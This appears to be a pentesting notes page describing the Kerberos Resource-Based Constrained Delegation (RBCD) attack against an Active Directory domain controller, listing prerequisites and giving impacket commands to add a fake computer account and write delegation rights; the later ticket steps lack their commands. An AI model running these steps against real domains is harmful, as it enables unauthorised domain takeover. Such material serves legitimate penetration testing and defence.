search
The Hacker's Notes
githubEdit

RBCD (Resource-Based Constrained Delegation) Attack

Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.

hashtag
Exploit

Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegationarrow-up-right

hashtag
0. Prerequisites

To achieve this attack successfully, we need the following conditions:

  • A domain account who has permission to write the computer (msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).

  • A domain account who has permission to create a new computer.

  • LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.

  • Kerberos (88) access to the DC.

hashtag
1. Create Fake Computer

impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'

hashtag
2. Modify Delegation Rights

We can use rbcd.pyarrow-up-right for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.

impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'

hashtag
3. Get the Impersonated Service Ticket

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.

hashtag
4. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting. Before doing that, we need to add the environment variable as below:

hashtag
References

PreviousKerberoasting AttackNextShadow Credentials

Last updated